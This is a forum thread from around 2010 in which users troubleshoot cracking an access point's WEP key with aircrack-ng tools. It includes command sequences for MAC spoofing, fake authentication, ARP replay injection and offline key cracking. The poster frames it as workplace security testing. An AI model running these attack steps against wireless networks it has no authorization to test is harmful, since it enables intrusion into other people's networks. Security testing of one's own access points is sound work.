Thread: WEP Crack Aireplay-ng

  1. #1
    kiloraw (Just burned his ISO)
    Join Date: Jan 2010
    Location: On the side, in the middle, compass points east
    Posts: 9

    WEP Crack Aireplay-ng

    First I must say, wonderful job on the vol. 4. I think going to Ubuntu will be well worth it; sucks for the gurus right now, but like I said it will be worth it.

    As for my problem:
    Scenario:
    At work, trying to crack an AP's WEP. I will have to do this a lot more, since it will be my job to test the security of wireless APs, which will have WPA2. Trying to crack WEP now, for knowledge, and it seems logical. The AP has no clients, and the ESSID is not broadcast. I decided to ask my co-worker what the AP's ESSID was, so that I could troubleshoot whether it was a user error or not.

    Card: 3945 iwl

    airmon-ng
    airmon-ng stop (interface)
    ifconfig (interface) down
    macchanger --mac 00:11:22:33:44:55 (interface)
    airmon-ng start (interface)

    airodump-ng (interface)
    airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)


    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

    The command above is where I get stuck; the aircrack tutorial says to "Do not proceed to the next step until you have the fake authentication running correctly."

    The terminal comes back and states
    Sending Authentication Request (shared) [ACK]
    Authentication 1/2 successful
    Sending encrypted challenge
    Attack was unsuccessful
    Then it gives me a list of reasons why it did not work.


    NEVERMIND this post... Figured it out... You have to at least have prior data to crack WEP
    duh
    hxxp://forums.remote-exploit.org/wireless/6535-wep-cracking-no-clients-no-ssid.html
    I read the forum discussion; it really cleared up a lot. I recommend to all future newbs (including myself) to really read the aircrack site.
    Just to make sure, and please someone post if this is true:
    "The tutorials are about the situation when you see no client :
    hxxp://www.aircrack-ng.org/doku.php?...ith_no_clients
    but to do the fragmentation you need the WEP encrypted data thus either it is from previous session or from a nonvisible client, as there is no data obtain from fakeauth. When you read any tutorial look at the MAC's in collected packets used to frag attack.
    If you have no client connected ( wlan or lan ) you have no data to collect thus cannot attack the AP unless you have previously collected data.
    LAN client can send data through wireless when addressing wireless client"
    Last edited by kiloraw; 01-22-2010 at 09:32 PM. Reason: Figured out my own problem...

  2. #2
    Archangel-Amael (Super Moderator)
    Join Date: Jan 2010
    Location: Somewhere
    Posts: 8,012

    Re: WEP Crack Aireplay-ng

    This is not a how-to or tutorial. Please post in the correct section of the forums.

  3. #3
    Member
    Join Date: Jan 2010
    Location: Helsinki, Finland
    Posts: 235

    Re: WEP Crack Aireplay-ng

    Well, I do WEP like this:
    Code:
        airmon-ng stop wlan0
        airmon-ng start wlan0
        "I'll be using mon0 (it's now in monitor mode)"

        airodump-ng mon0 -w /tmp/WEP --channel (AP channel) --bssid (AP bssid)
    
    NEW CONSOLE
        aireplay-ng -1 0 -a bssid (AP bssid) mon0
    
    NEW CONSOLE
        aireplay-ng -3 -b (AP bssid) mon0

    Wait until the number in the newest console is over 30000 (the second number)
    Then stop all of these
    Then
        aircrack-ng /tmp/WEP-01.cap
    Here is a guide
    http://www.aircrack-ng.org/doku.php?...ith_no_clients

    Yes, I use the no-clients WEP hack even if there are clients
    Last edited by halfdone; 01-23-2010 at 12:15 PM.

  4. #4
    Junior Member
    Join Date: Jan 2010
    Posts: 27

    Re: WEP Crack Aireplay-ng

    You need fake auth with shared key...

    Shared key can be hooked when a client connects to the AP...
    To hook the shared key you can use airodump-ng, and wait until someone connects

    Then you have to fake auth
